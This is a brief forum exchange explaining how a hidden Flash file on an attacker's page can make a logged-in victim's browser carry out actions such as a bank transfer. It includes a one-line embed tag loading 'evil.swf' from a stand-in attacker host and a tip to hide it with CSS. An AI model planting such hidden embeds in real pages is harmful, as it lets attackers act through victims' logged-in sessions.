The user would first have to go to the attacker.com phishing site though right?
It sounds like it makes phishing scams a lot easier.
(thanks for the explanation btw)
It sounds like it makes phishing scams a lot easier.
(thanks for the explanation btw)
It could be totally automated. But, since the attacker doesn't get the response, they couldn't necessarily do anything with that. That doesn't make this any less dangerous, as in the bank example, you don't necessarily need to see that your transfer was successful in order to get the money.
<embed src="http://attacker.com/evil.swf></embed>
is all that you need to execute this attack in your browser. An attacker can hide the applet via CSS and put it on a legitimate looking page. All the target needs to do is be logged in.Edit: grammar.